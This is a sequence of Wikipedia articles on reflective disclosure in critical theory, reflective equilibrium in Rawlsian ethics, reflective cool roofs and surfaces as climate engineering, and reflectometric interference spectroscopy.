Reflective disclosure is a model of social criticism proposed and developed by philosopher Nikolas Kompridis . It is partly based on Martin Heidegger's insights into the phenomenon of world disclosure , which Kompridis applies to the field of political and social philosophy . The term refers to practices through which we can imagine and articulate meaningful alternatives to current social and political conditions, by acting back on their conditions of intelligibility. This could uncover possibilities that were previously suppressed or untried, or make us insightfully aware of a problem in a way that allows us to go on differently with our institutions , traditions and ideals .
In his book Critique and Disclosure: Critical Theory between Past and Future , Kompridis describes a set of heterogeneous social practices he believes can be a source of significant ethical, political, and cultural transformation. [ 1 ] Highlighting the work of theorists such as Hannah Arendt , Charles Taylor , Michel Foucault and others, Kompridis calls such practices examples of "reflective disclosure" after Martin Heidegger's insights into the phenomenon of world disclosure . He also argues that social criticism or critique, and in particular critical theory , ought to incorporate Heidegger's insights about this phenomenon and reorient itself around practices of reflective disclosure if it is, as he puts it, "to have a future worthy of its past". [ 2 ]
These practices, according to Kompridis, constitute what Charles Taylor calls a "new department" of reason [ 3 ] which is distinct from instrumental reason , from reason understood merely as the slave of the passions ( Hume ), and from the idea of reason as public justification ( Rawls ). In contrast to theories of social and political change that emphasize socio-historical contradictions (i.e., Marxist and neo-Marxist ), theories of recognition and self-realization, and theories that try to make sense of change in terms of processes that are outside the scope of human agency , Kompridis' paradigm for critical theory, with reflective disclosure at the centre, is to help reopen the future by disclosing alternative possibilities for speech and action, self-critically expanding what he calls the normative and logical "space of possibility". [ 4 ]
Kompridis contrasts his own vision of critical theory with a Habermasian emphasis on the procedures by which we can reach agreement in modern democratic societies. He claims the latter has ignored the utopian concerns that previously animated critical theory, and narrowed its scope in a way that brings it closer to liberal and neo- Kantian theories of justice.
This article about critical theory is a stub . You can help Wikipedia by expanding it . | https://en.wikipedia.org/wiki/Reflective_disclosure |
Reflective equilibrium is a state of balance or coherence among a set of beliefs arrived at by a process of deliberative mutual adjustment among general principles and particular judgements . Although he did not use the term, philosopher Nelson Goodman introduced the method of reflective equilibrium as an approach to justifying the principles of inductive logic [ 1 ] (this is now known as Goodman's method ). [ 2 ] The term reflective equilibrium was coined by John Rawls and popularized in his A Theory of Justice as a method for arriving at the content of the principles of justice.
Dietmar Hübner [ de ] has pointed out that there are many interpretations of reflective equilibrium that deviate from Rawls' method in ways that reduce the cogency of the idea. [ 3 ] Among these misinterpretations, according to Hübner, are definitions of reflective equilibrium as "(a) balancing theoretical accounts against intuitive convictions; (b) balancing general principles against particular judgements; (c) balancing opposite ethical conceptions or divergent moral statements". [ 3 ]
Rawls argues that human beings have a "sense of justice " that is a source of both moral judgment and moral motivation. In Rawls's theory, we begin with "considered judgments" that arise from the sense of justice. These may be judgments about general moral principles (of any level of generality) or specific moral cases. If our judgments conflict in some way, we proceed by adjusting our various beliefs until they are in "equilibrium", which is to say that they are stable, not in conflict, and provide consistent practical guidance. Rawls argues that a set of moral beliefs in ideal reflective equilibrium describes or characterizes the underlying principles of the human sense of justice.
For example, suppose that Zachary believes in the general principle of always obeying the commands in the Bible . Suppose also that he thinks that it is not ethical to stone people to death merely for being Wiccan . These views may come into conflict (see Exodus 22:18 versus John 8:7). If they do, Zachary will then have several choices. He can discard his general principle in search of a better one, such as obeying only the Ten Commandments ; or modify his general principle by choosing a different translation of the Bible, or letting Jesus' teaching from John 8:7 "If any of you is without sin, let him be the first to cast a stone", override the Old Testament command; or change his opinions about the point in question to conform with his theory, by deciding that witches really should be killed. Whatever the decision, he has moved toward reflective equilibrium.
Reflective equilibrium serves an important justificatory function within Rawls's political theory. The nature of this function, however, is disputed. The dominant view, best exemplified by the work of Norman Daniels and Thomas Scanlon , is that the method of reflective equilibrium is a kind of coherentist method for the epistemic justification of moral beliefs. However, in other writings, Rawls seems to argue that his theory bypasses traditional metaethical questions, including questions of moral epistemology, and is intended instead to serve a practical function. This provides some motivation for a different view of the justificatory role of reflective equilibrium. On this view, the method of reflective equilibrium serves its justificatory function by linking together the cognitive and motivational aspects of the human sense of justice in the appropriate way.
Rawls argues that candidate principles of justice cannot be justified unless they are shown to be stable. Principles of justice are stable if, among other things, the members of society regard them as authoritative and reliably comply with them. The method of reflective equilibrium determines a set of principles rooted in the human sense of justice, which is a capacity that both provides the material for the process of reflective equilibration and our motivation to adhere to principles we judge morally sound. The method of reflective equilibrium serves the aim of defining a realistic and stable social order by determining a practically coherent set of principles that are grounded in the right way in the source of our moral motivation, such that we will be disposed to comply with them. As Fred D'Agostino puts it, stable principles of justice will require considerable "up-take" by the members of society. The method of reflective equilibrium provides a way of settling on principles that will achieve the kind of "up-take" necessary for stability.
Reflective equilibrium is not static, though Rawls allows for provisional fixed points; it will change as the individual considers his opinions about individual issues or explores the consequences of his principles. [ 4 ]
Rawls applied this technique to his conception of a hypothetical original position from which people would agree to a social contract . He arrived at the conclusion that the optimal theory of justice is the one to which people would agree from behind a veil of ignorance , not knowing their social positions.
Wide reflective equilibrium, first introduced by Rawls, has been described by Norman Daniels as "a method that attempts to produce coherence in ordered triple sets of beliefs held by a particular person, namely: (a) a set of considered moral judgments, (b) a set of moral principles, and (c) a set of relevant (scientific and philosophical) background theories". [ 5 ]
Kai Nielsen has asserted that "philosophers who are defenders of reflective equilibrium are also constructivists ", in response to what he considered to be the misconception that reflective equilibrium works with some necessarily preexisting coherent system of moral beliefs and practices: [ 6 ]
The pattern of consistent beliefs, including very centrally moral beliefs, is not a structure to be discovered or unearthed, as if it were analogous to the deep underlying "depth grammar" of language (if indeed there is any such a thing), but something to be forged —constructed—by a careful and resolute use of the method of reflective equilibrium. We start from our considered judgments (convictions), however culturally and historically skewed. This involves—indeed, inescapably involves—seeing things by our own lights. Where else could we start? We can hardly jump out of our cultural and historical skins. [ 6 ]
Paul Thagard has criticized the method of reflective equilibrium as "only like a smokescreen for a relatively sophisticated form of logical and methodological relativism" and "at best incidental to the process of developing normative principles". [ 7 ] Among the "numerous problems" of reflective equilibrium, Thagard counted "undue reliance on intuition and the danger of arriving at stable but suboptimal sets of norms". [ 8 ] In place of reflective equilibrium, Thagard recommended what he considered to be a more consequentialist method of justifying norms by identifying a domain of practices, identifying candidate norms for the practices, identifying the appropriate goals of the practices, evaluating the extent to which different practices accomplish these goals, and adopting as domain norms the practices that best accomplish these goals. [ 8 ] [ 9 ] | https://en.wikipedia.org/wiki/Reflective_equilibrium |
Reflective surfaces , or ground-based albedo modification ( GBAM ), is a solar radiation management method of enhancing Earth's albedo (the ability to reflect the visible , infrared , and ultraviolet wavelengths of the Sun , reducing heat transfer to the surface). The IPCC described GBAM as "whitening roofs, changes in land use management (e.g., no-till farming ), change of albedo at a larger scale (covering glaciers or deserts with reflective sheeting and changes in ocean albedo)." [ 1 ] : 348
The most well-known type of reflective surface is a type of roof called the "cool roof". While cool roofs are mostly associated with white roofs, they come in a variety of colors and materials and are available for both commercial and residential buildings. [ 2 ] Painting roof materials in white or pale colors to reflect solar radiation is encouraged by legislation in some areas (notably California). [ 3 ]
This technique is limited in its ultimate effectiveness by the constrained surface area available for treatment. This technique can give between 0.01 and 0.19 W/m 2 of globally averaged negative forcing, depending on whether cities or all settlements are so treated. [ 4 ] This is small relative to the 3.7 W/m 2 of positive forcing from a doubling of atmospheric carbon dioxide. Moreover, while in small cases it can be achieved at little or no cost by simply selecting different materials, it can be costly if implemented on a larger scale.
A 2009 Royal Society report states that, "the overall cost of a 'white roof method' covering an area of 1% of the land surface (about 10 12 m 2 ) would be about $300 billion/yr, making this one of the least effective and most expensive methods considered." [ 5 ] However, it can reduce the need for air conditioning , which emits carbon dioxide and contributes to global warming.
As a method to address global warming , the IPCC 2018 report indicated that the potential for global temperature reduction was "small," yet was in high agreement over the recognition of temperature changes of 1-3 °C on a regional scale. [ 1 ] Limited application of reflective surfaces can mitigate urban heat island effect. [ 6 ]
Reflective surfaces can be used to change the albedo of agricultural and urban areas, noting that a 0.04-0.1 albedo change in urban and agricultural areas could potentially reduce global temperatures for overshooting 1.0 °C. [ 1 ]
The reflective surfaces approach is similar to passive daytime radiative cooling (PDRC) being that they are both ground-based, yet PDRC focuses on "increasing the radiative heat emission from the Earth rather than merely decreasing its solar absorption." [ 7 ]
Cool roofs, in hot climates, can offer both immediate and long-term benefits including:
Cool roofs achieve cooling energy savings in hot summers but can increase heating energy load during cold winters. [ 11 ] Therefore, the net energy saving of cool roofs varies depending on climate. However, a 2010 energy efficiency study [ 12 ] looking at this issue for air-conditioned commercial buildings across the United States found that the summer cooling savings typically outweigh the winter heating penalty even in cold climates near the Canada–US border giving savings in both electricity and emissions. Without a proper maintenance program to keep the material clean, the energy savings of cool roofs can diminish over time due to albedo degradation and soiling. [ 13 ]
A modelling study of the impacts of reductions in temperature due to cool roofs in London during the 2018 British Isles heatwave found that heat-related mortality in this period (estimated 655–920) could have been reduced by 249 (32%) in a scenarios where all buildings are assumed to have cool roofs installed. Using value of statistical life, the benefits in terms of avoided deaths for cool were estimated at a saving of £615 million. [ 14 ]
Research and practical experience with the degradation of roofing membranes over a number of years have shown that heat from the sun is one of the most potent factors that affects durability. High temperatures and large variations, seasonally or daily, at the roofing level are detrimental to the longevity of roof membranes. Reducing the extremes of temperature change will reduce the incidence of damage to membrane systems. Covering membranes with materials that reflect ultraviolet and infrared radiation will reduce damage caused by UV and heat degradation. White surfaces reflect more than half of the radiation that reaches them, while black surfaces absorb almost all. White or white coated roofing membranes, or white gravel cover would appear to be the best approach to control these problems where membranes must be left exposed to solar radiation. [ 15 ]
If all urban, flat roofs in warm climates were whitened, the resulting 10% increase in global reflectivity would offset the warming effect of 24 gigatonnes of greenhouse gas emissions, or equivalent to taking 300 million cars off the road for 20 years. This is because a 93-square-metre (1,000 sq ft) white roof will offset 10 tons of carbon dioxide over its 20-year lifetime. [ 16 ] In a real-world 2008 case study [ 17 ] of large-scale cooling from increased reflectivity, it was found that the Province of Almeria, Southern Spain, has cooled 1.6 °C (2.9 °F) over a period of 20 years compared to surrounding regions, as a result of polythene-covered greenhouses being installed over a vast area that was previously open desert. In the summer the farmers whitewash these roofs to cool their plants down.
When sunlight falls on a white roof much of it is reflected and passes back through the atmosphere into space. But when sunlight falls on a dark roof most of the light is absorbed and re-radiated as much longer wavelengths, which are absorbed by the atmosphere. (The gases in the atmosphere that most strongly absorb these long wavelengths have been termed "greenhouse gases"). [ 18 ] Findings of a study conducted by Syed Ahmad Farhan et al. from Universiti Teknologi PETRONAS and Universiti Teknologi MARA in 2021, [ 2 ] which is based on the hot and humid climate of Malaysia , suggest that the selection of white roof tiles significantly reduces the peaks of heat conduction transfer and roof-top surface temperature as well as the values of heat conduction transfer and roof-top surface temperature throughout diurnal profiles. Contrarily, the results also reveal that it does not influence the nocturnal profiles, as a release of heat to the sky takes place throughout the night. The release of heat from the building occurs due to the absence of solar radiation, which reduces the sky temperature and enables the sky to act as a heat sink that promotes the transfer of heat from the building to the sky to achieve thermal equilibrium .
A 2012 study by researchers at Concordia University included variables similar to those used in the Stanford study (e.g., cloud responses) and estimated that worldwide deployment of cool roofs and pavements in cities would generate a global cooling effect equivalent to offsetting up to 150 gigatonnes of carbon dioxide emissions – enough to take every car in the world off the road for 50 years. [ 19 ] [ 20 ]
White thermoplastic membrane roofs (PVC and TPO) are inherently reflective, achieving some of the highest reflectance and emittance measurements of which roofing materials are capable. [ 21 ] A roof made of white thermoplastic, for example, can reflect 80 percent or more of the sun's rays and emit at least 70% of the solar radiation that the roof absorbs. An asphalt roof only reflects between 6 and 26% of solar radiation.
In addition to the white Thermoplastic PVC and TPO membranes used in many commercial cool roof applications, there is also research in the field of cool asphalt shingles. Asphalt shingles make up the majority of the North American residential roofing market, and consumer preferences for darker colors make creating solar-reflective shingles a particular challenge, causing asphalt shingles to have solar reflectances of only 4%-26%. When these roofs are designed to reflect increased amount of solar radiation, the urban heat island effect can be reduced through the reduced need for cooling costs in the summer. Though a more reflective roof can lead to higher heating costs in the colder months, studies have shown that the increased winter heating costs are still lower than the summer cooling cost savings. [ 22 ] To satisfy the consumer demands for darker colors which still reflect significant amounts of sunlight, different materials, coating processes, and pigments are used. Since only 43% of light occurs in the visible light spectrum, reflectance can be improved without affecting color by increasing the reflectance of UV and IR light. [ 23 ] High surface roughness can also contribute to the low solar reflectances of asphalt shingles, as these shingles are made of many small approximately spherical granules which have a high surface roughness. [ 24 ] To decrease this, other granule materials are being investigated, such as flat rock flakes, which could reduce the reflectance inefficiencies due to surface roughness. Another alternative is to coat the granules using a dual coat process: the outer coating would have the desired color pigment, though it may not be very reflective, while the inner coating is a highly reflective titanium dioxide coating.
Natural white gravel covering can be seen as an alternative option to obtain cool roofing and cool pavements. [ 25 ]
The highest SRI rating, and the coolest roofs, are stainless steel roofs, which are just several degrees above ambient under medium wind conditions. Their SRI's range from 100 to 115. Some are also hydrophobic so they stay very clean and maintain their original SRI even in polluted environments. [A]
An existing (or new) roof can be made reflective by applying a solar reflective coating to its surface. The reflectivity and emissivity ratings for over 500 reflective coatings can be found in the Cool Roofs Rating Council. [ 26 ]
Researchers at the Lawrence Berkeley National Laboratory have determined that a pigment used by the ancient Egyptians known as " Egyptian blue " absorbs visible light, and emits light in the near-infrared range. It may be useful in construction materials to keep roofs and walls cool. [ 27 ] [ 28 ] [ 29 ]
They have also developed fluorescent ruby red coatings which have reflective properties similar to white roofs. [ 30 ] [ 31 ]
Green roofs provide a thermal mass layer which helps reduce the flow of heat into a building. The solar reflectance of green roofs varies depending on the plant types (generally 0.3–0.5). [ 32 ] Green roofs may not reflect as much as a cool roof but do have other benefits such as evapotranspiration which cools the plants and the immediate area around the plants, aiding in lowering rooftop temperatures but increasing humidity, naturally. Moreover, some Green roofs need maintenance such as regular watering.
A 2011 study by researchers at Stanford University suggested that although reflective roofs decrease temperatures in buildings and mitigate the " urban heat island effect", they may actually increase global temperature. [ 33 ] [ 34 ] The study noted that it did not account for the reduction in greenhouse gas emissions that results from building energy conservation (annual cooling energy savings less annual heating energy penalty) associated with cool roofs (meaning that one will need to use more energy to heat the living space due to reduction in heat from sunlight in winter.) However, this applies only to those areas with low winter temperatures – not tropical climates. Also, homes in areas receiving snow in winter months are unlikely to receive significantly more heat from darker roofs, as they will be snow-covered most of the winter. A response paper titled "Cool Roofs and Global Cooling," by researchers in the Heat Island Group at Lawrence Berkeley National Laboratory, raised additional concerns about the validity of these findings, citing the uncertainty acknowledged by the authors, statistically insignificant numerical results, and insufficient granularity in analysis of local contributions to global feedbacks. [ 35 ]
Also, 2012 research at University of California, San Diego 's Jacobs School of Engineering into the interaction between reflective pavements and buildings found that, unless the nearby buildings are fitted with reflective glass or other mitigation factors, solar radiation reflected off light-colored pavements can increase the temperature in nearby buildings, increasing air conditioning demands and energy usage. [ 36 ]
In 2014, a team of researchers, led by Matei Georgescu, an assistant professor in Arizona State University 's School of Geographical Sciences and Urban Planning and a senior sustainability scientist in the Global Institute of Sustainability , explored the relative effectiveness of some of the most common adaptation technologies aimed at reducing warming from urban expansion. Results of the study indicate that the performance of urban adaptation technologies can counteract this increase in temperature, but also varies seasonally and is geographically dependent. [ 37 ]
Specifically, what works in California's Central Valley, such as cool roofs, does not necessarily provide the same benefits to other regions of the country, like Florida. Assessing consequences that extend beyond near surface temperatures, such as rainfall and energy demand, reveals important trade-offs that are often unaccounted for. Cool roofs have been found to be particularly effective for certain areas during summertime. However, during winter, these same urban adaptation strategies, when deployed in northerly locations, further cool the environment, and consequently require additional heating to maintain comfort levels. “The energy savings gained during the summer season, for some regions, is nearly entirely lost during the winter season,” Georgescu said. In Florida, and to a lesser extent southwestern states, there is a very different effect caused by cool roofs. “In Florida, our simulations indicate a significant reduction in precipitation," he said. "The deployment of cool roofs results in a 2 to 4 millimeter per day reduction in rainfall, a considerable amount (nearly 50 percent) that will have implications for water availability, reduced stream flow and negative consequences for ecosystems. For Florida, cool roofs may not be the optimal way to battle the urban heat island because of these unintended consequences.” Overall, the researchers suggest that judicious planning and design choices should be considered in trying to counteract rising temperatures caused by urban sprawl and greenhouse gases. They add that “urban-induced climate change depends on specific geographic factors that must be assessed when choosing optimal approaches, as opposed to one-size-fits-all solutions.” [ 38 ]
A series of Advanced Energy Design Guides were developed in cooperation with ASHRAE (American Society of Heating, Refrigerating and Air-Conditioning Engineers), AIA (The American Institute of Architects ), IESNA (Illuminating Engineering Society of North America), USGBC (United States Green Building Council) and US DOE (United States Department of Energy) in 2011. These guides were aimed at achieving 50% Energy Savings toward a Net zero-energy building and covered the building types of Small to Medium Office Buildings, Medium to Big Box Retail Buildings, Large Hospitals and K-12 School Buildings. In Climate Zones 4 and above the recommendation is to follow the ASHRAE 90.1 standard for roof reflectance, which does not require roofs to be reflective in these zones. In Climate Zones 4 and above, Cool Roofs are not a recommended Design Strategy. [ 39 ]
A series of Advanced Energy Retrofit Guides for “Practical Ways to Improve Energy Performance” were developed in cooperation with the US DOE (United States Department of Energy) and PNNL (Pacific Northwest National Laboratory) in 2011. These guides were aimed at improvements to existing Retail and Office buildings which could improve their energy efficiency. Cool roofs were not recommended for all locations. “This measure is likely more cost-effective in the hot and humid climate zone, which has a long cooling season, than in the very cold climate zone, for example. For buildings located in warm climates, this measure is worth consideration.” [ 40 ] [ 41 ]
The Copper Development Association has conducted several studies, beginning in 2002, which examined the elevated temperatures of wiring inside conduits at and above various color roof materials. The findings concluded that the temperatures above cool roofs were higher than those of a darker colored roof material. This illustrates the idea in which deflected solar radiation, when impeded by rooftop equipment, piping, or other materials will be subjected to the heat gain of the radiation. [ 42 ]
According to the US DOE ’s "Guidelines for Selecting Cool Roofs":
“Cool roofs must be considered in the context of your surroundings. It is relatively easy to specify a cool roof and predict energy savings, but some thinking ahead can prevent other headaches. Ask this question before installing a cool roof: Where will the reflected sunlight go?
A bright, reflective roof could reflect light and heat into the higher windows of taller neighboring buildings. In sunny conditions, this could cause uncomfortable glare and unwanted heat for you or your neighbors. Excess heat caused by reflections increases air conditioning energy use, negating some of the energy saving benefits of the cool roof.” [ 43 ]
According to the US DOE 's "Guidelines for Selecting Cool Roofs" on the subject of cool roof maintenance:
"As a cool roof becomes dirty from pollution, foot traffic, wind-deposited debris, ponded water, and mold or algae growth, its reflectance will decrease, leading to higher temperatures. Especially dirty roofs may perform substantially worse than product labels indicate. Dirt from foot traffic may be minimized by specifying designated walkways or by limiting access to the roof. Steep sloped roofs have less of a problem with dirt accumulation because rainwater can more easily wash away dirt and debris. Some cool roof surfaces are “self-cleaning” which means they shed dirt more easily and may better retain their reflectance. Cleaning a cool roof can restore solar reflectance close to its installed condition. Always check with your roof manufacturer for the proper cleaning procedure, as some methods may damage your roof. While it is generally not cost effective to clean a roof just for the energy savings, roof cleaning can be integrated as one component of your roof's routine maintenance program. It is therefore best to estimate energy savings based on weathered solar reflectance values rather than clean roof values." [ 43 ]
When the sunlight strikes a dark rooftop, about 15% of it gets reflected back into the sky but most of its energy is absorbed into the roof system in the form of heat. Cool roofs reflect significantly more sunlight and absorb less heat than traditional dark-colored roofs. [ 9 ]
There are two properties that are used to measure the effects of cool roofs:
Another method of evaluating coolness is the solar reflectance index (SRI), which incorporates both solar reflectance and emittance in a single value. SRI measures the roof's ability to reject solar heat, defined such that a standard black (reflectance 0.05, emittance 0.90) is 0 and a standard white (reflectance 0.80, emittance 0.90) is 100. [ 44 ]
A perfect SRI is approximately 122, the value for a perfect mirror, which absorbs no sunlight and has very low emissivity. The only practical material which approaches this level is stainless steel with an SRI of 112. High-reflectivity, low-emissivity roofs maintain a temperature very close to ambient at all times preventing heat gains in hot climates and minimizing heat loss in cold climates. High emissivity roofs have much higher heat loss in cold climates for the same insulation values.
The Roof Savings Calculator (RSC) is a tool developed by the U.S. Department of Energy's Oak Ridge National Laboratory which estimates cooling and heating savings for low-slope roof applications with white and black surfaces. [ 45 ]
This tool was the collaboration of both Oak Ridge National Laboratory and Lawrence Berkeley National Laboratory in order to provide industry-consensus roof savings for both residential and commercial buildings. It reports the net annual energy savings (cooling energy savings minus heating penalties) and thus is only applicable to the buildings with a heating and/or cooling system. [ 46 ]
Solar reflective cars or cool cars reflect more sunlight than dark cars, reducing the amount of heat that is transmitted into the car's interior. Therefore, it helps decrease the need for air conditioning, fuel consumption, and emissions of greenhouse gases and urban air pollutants. [ 47 ]
Cool color parking lots are parking lots made with a reflective layer of paint. [ 48 ] Cool pavements which are designed to reflect solar radiation may use modified mixes, reflective coatings, permeable pavements, and vegetated pavements. [ 49 ]
Mirrors are being explored as a reflective surface to reflect solar radiation and cool temperatures. MEER is a nonprofit proposing the use of recycled materials to manufacture mirrors and polymer reflective films for potential widespread use on rooftops and in open spaces such as farmland. Trials have been undertaken in California and further application opportunities are developing in New Hampshire , India , and Africa . [ 50 ]
Some papers have proposed the deployment of specific thermal emitters (whether via advanced paint, or printed rolls of material) which would simultaneously reflect sunlight and also emit energy at longwave infrared (LWIR) lengths of 8–20 μm, which is too short to be trapped by the greenhouse effect and would radiate into outer space. It has been suggested that to stabilize Earth's energy budget and thus cease warming, 1–2% of the Earth's surface (area equivalent to over half of Sahara ) would need to be covered with these emitters, at the deployment cost of $1.25–2.5 trillion. While low next to the estimated $20 trillion saved by limiting the warming to 1.5 °C (2.7 °F) rather than 2 °C (3.6 °F), it does not include any maintenance costs. [ 51 ] [ 52 ]
In some climates where there are more heating days than cooling days, white reflective roofs may not be effective in terms of energy efficiency or savings because the savings on cooling energy use can be outweighed by heating penalties during winter. According to the U.S. Energy Information Administration, 2003 Commercial Buildings Energy Consumption Survey, heating accounts for 36% of commercial buildings' annual energy consumption, while air conditioning only accounts for 8% in United States. [ 53 ] Energy calculators generally show a yearly net savings for dark-colored roof systems in cool climates.
A perfect roof would absorb no heat in the summer and lose no heat in the winter. To do this it would need a very high SRI to eliminate all radiative heat gains in summer and losses in winter. High SRI roofs act as a radiant barrier , providing a thermos-bottle effect. High emissivity cool roofs carry a climate penalty due to winter radiative heat losses, which reflective bare metal roofs, such as stainless steel, do not.
In a 2001 federal study, the Lawrence Berkeley National Laboratory (LBNL) measured and calculated the reduction in peak energy demand associated with a cool roof's surface reflectance. [ 54 ] LBNL found that, compared to the original black rubber roofing membrane on the Texas retail building studied, a retrofitted vinyl membrane delivered an average decrease of 24 °C (43 °F) in surface temperature, an 11% decrease in aggregate air conditioning energy consumption, and a corresponding 14% drop in peak hour demand. The average daily summertime temperature of the black roof surface was 75 °C (167 °F), but once retrofitted with a white reflective surface, it measured 52 °C (126 °F). Without considering any tax benefits or other utility charges, annual energy expenditures were reduced by $7,200 or $0.07/square foot.(This figure is for energy charges as well as peak demand charges).
Instruments measured weather conditions on the roof, temperatures inside the building and throughout the roof layers, and air conditioning and total building power consumption. Measurements were taken with the original black rubber roofing membrane and then after replacement with a white vinyl roof with the same insulation and HVAC systems in place.
Though a full year of actual data was collected, due to aberrations in the data, one month of data was excluded along with several other days which didn't meet the parameters of the study. Only 36 continuous pre-retrofit days were used and only 28 non-continuous operating days were used for the post-retrofit period. [ 54 ]
Another case study, conducted in 2009 and published in 2011, was completed by Ashley-McGraw Architects and CDH Energy Corp for Onondaga County Dept. of Corrections, in Jamesville, New York, evaluated energy performance of a green or vegetative roof, a dark EPDM roof and a white reflective TPO roof. The measured results showed that the TPO and vegetative roof systems had much lower roof temperatures than the conventional EPDM surface. The reduction in solar absorption reduced solar gains in the summer but also increased heat losses during the heating season. Compared to the EPDM membrane, the TPO roof had 30% higher heating losses and the vegetative roof had 23% higher losses. [ 55 ]
In July 2010, the United States Department of Energy announced a series of initiatives to more broadly implement cool roof technologies on DOE facilities and buildings across the country. [ 56 ] As part of the new efforts, DOE will install a cool roof, whenever cost-effective over the lifetime of the roof, during construction of a new roof or the replacement of an old one at a DOE facility.
In October 2013, the United States Department of Energy ranked Cool Roofs as a 53 out of 100 (0 to 100 weighted average) for a cost-effective energy strategy. [ 57 ] "Climate issues can affect cool roof performance. Cool roofs are more beneficial in warmer climates and may cause energy consumption for heating applications to rise in colder climates. Cool roofs have a lower impact the more insulation is used. The Secretary of Energy directed all U.S. Department of Energy (DOE) offices to install cool roofs, when life-cycle cost-effectiveness is demonstrated, when constructing new roofs, or when replacing old roofs at DOE facilities. Other Federal agencies were also encouraged to do the same." [ 57 ]
Energy Star is a joint program of the U.S. Environmental Protection Agency and the U.S. Department of Energy designed to reduce greenhouse gas emissions and help businesses and consumers save money by making energy-efficient product choices.
For low-slope roof applications, a roof product qualifying for the Energy Star label under its Roof Products Program must have an initial solar reflectivity of at least 0.65, and weathered reflectance of at least 0.50, in accordance with EPA testing procedures. [ 58 ] Warranties for reflective roof products must be equal in all material respects to warranties offered for comparable non-reflective roof products, either by a given company or relative to industry standards.
Unlike other Energy Star-rated products, such as appliances, this rating system does not look at the entire roof assembly, but only the exterior surface. Consumers (i.e. building owners) may believe that the Energy Star label means their roof is energy-efficient; however, the testing is not as stringent as their appliance standard and does not include the additional components of a roof (i.e. roof structure, fire rated barriers, insulation, adhesives, fasteners, etc.). [ 59 ] A disclaimer is posted on their website "Although there are inherent benefits in the use of reflective roofing, before selecting a roofing product based on expected energy savings consumers should explore the expected calculated results that can be found on the Department of Energy's "Roof Savings Calculator" website at www.roofcalc.com. Please remember the Energy Savings that can be achieved with reflective roofing is highly dependent on facility design, insulation used, climatic conditions, building location, and building envelope efficiency." [ 59 ]
Cool Roof Rating Council [ 60 ] (CRRC) has created a rating system for measuring and reporting the solar reflectance and thermal emittance of roofing products. This system has been put into an online directory of more than 850 roofing products and is available for energy service providers, building code bodies, architects and specifiers, property owners and community planners. CRRC conducts random testing each year to ensure the credibility of its rating directory.
CRRC's rating program allows manufacturers and sellers to appropriately label their roofing products according to specific CRRC measured properties. The program does not, however, specify minimum requirements for solar reflectance or thermal emittance.
The Green Globe system is used in Canada and the United States. In the U.S., Green Globes is owned and operated by the Green Building Initiative (GBI). In Canada, the version for existing buildings is owned and operated by BOMA Canada under the brand name 'Go Green' (Visez vert).
Green Globe uses performance benchmark criteria to evaluate a building's likely energy consumption, comparing the building design against data generated by the EPA's Target Finder, which reflects real building performance. Buildings may earn a rating of between one and four globes. This is an online system; a building's information is verified by a Green Globes-approved and trained licensed engineer or architect. To qualify for a rating, roofing materials must have a solar reflectance of at least 0.65 and thermal emittance of at least 0.90. As many as 10 points may be awarded for 1–100 percent roof coverage with either vegetation or highly reflective materials or both. The basis in physics of a high emittance is quite questionable, since it merely describes a material which easily radiates infrared wavelength heat to the environment, contributing to the greenhouse effect. Highly reflective, low-emittance materials are much better at reducing energy consumption.
The U.S. Green Building Council's Leadership in Energy and Environmental Design (LEED) rating system is a voluntary, continuously evolving national standard for developing high performance sustainable buildings. [ citation needed ] LEED provides standards for choosing products in designing buildings, but does not certify products. [ citation needed ]
Unlike a building code , such as the International Building Code , only members of the USGBC and specific "in-house" committees may add, subtract or edit the standard, based on an internal review process. Model Building Codes are voted on by members and "in-house" committees, but allow for comments and testimony from the general public during each and every code development cycle at Public Review hearings, generally held multiple times a year. [ 61 ]
Under the LEED 2009 version, to receive Sustainable Sites Credit 7.2 Heat Island Effect-Roof, at least 75% of the surface of a roof must use materials having a solar reflective index (SRI) of at least 78. This criterion can also be met by installing a vegetated roof for at least 50% of the roof area, or installing a high albedo and vegetated roof in combination that meets this formula: (Area of Roof meeting Minimum SRI Roof/0.75) + (Area of vegetated roof/0.5) ≥ Total Roof Area. [ 62 ]
Examples of LEED-certified buildings with white reflective roofs are below. [ 63 ]
This project is co-financed by the European Union in the framework of the Intelligent Energy Europe Programme.
The aim of the proposed action is to create and implement an Action Plan for the cool roofs in EU. The specific objectives are: to support policy development by transferring experience and improving understanding of the actual and potential contributions by cool roofs to heating and cooling consumption in the EU; to remove and simplify the procedures for cool roofs integration in construction and building's stock; to change the behaviour of decision-makers and stakeholders so to improve acceptability of the cool roofs; to disseminate and promote the development of innovative legislation, codes, permits and standards, including application procedures, construction and planning permits concerning cool roofs. [ 66 ] The work will be developed in four axes, technical, market, policy and end-users.
In tropical Australia, zinc-galvanized (silvery) sheeting (usually corrugated ) do not reflect heat as well as the truly "cool" color of white, especially as metallic surfaces fail to emit infrared back to the sky. [ 67 ] European fashion trends are now using darker-colored aluminium roofing, to pursue consumer fashions.
NYC °CoolRoofs is a New York City initiative to coat rooftops white with volunteers. [ 68 ] The program began in 2009 as part of PlaNYC , [ 69 ] and has coated over 5 million square feet of NYC rooftops white. [ 70 ] On Wednesday, September 25, 2013 Mayor Michael R Bloomberg declared it "NYC °CoolRoofs Day" in New York City with the coating of its 500th building and reducing the carbon footprint by over 2000 tons. Volunteers use paintbrushes and rollers to apply an acrylic, elastomeric coating to the roof membrane. [ 71 ] A 2011 Columbia University study of roofs coated through the program found that white roofs showed an average temperature reduction of 43 degrees Fahrenheit when compared to black roofs. [ 72 ]
White Roof Project is a US nationwide initiative [ 73 ] that educates and empowers individuals [ 74 ] to coat rooftops white. The program's outreach [ 75 ] has helped complete white roof projects in more than 20 US states and five countries, engaged thousands in volunteer projects, and sponsored the coating of hundreds of nonprofit and low-income rooftops .
An urban heat island occurs where the combination of heat-absorbing infrastructure such as dark asphalt parking lots and road pavement and expanses of black rooftops, coupled with sparse vegetation, raises air temperature by 1 to 3 °C (1.8 to 5.4 °F) higher than the temperature in the surrounding countryside. [ 76 ] [ 77 ]
Green building programs advocate the use of cool roofing to mitigate the urban heat island effect and the resulting poorer air quality (in the form of smog) the effect causes. By reflecting sunlight, light-colored roofs minimize the temperature rise and reduce cooling energy use and smog formation. A study by LBNL showed that, if strategies to mitigate this effect, including cool roofs, were widely adopted, the Greater Toronto metropolitan area could save more than $11 million annually on energy costs. [ 78 ] | https://en.wikipedia.org/wiki/Reflective_surfaces_(climate_engineering) |
Reflectometric interference spectroscopy (RIfS) is a physical method based on the interference of white light at thin films, which is used to investigate molecular interaction.
The underlying measuring principle corresponds to that of the Michelson interferometer .
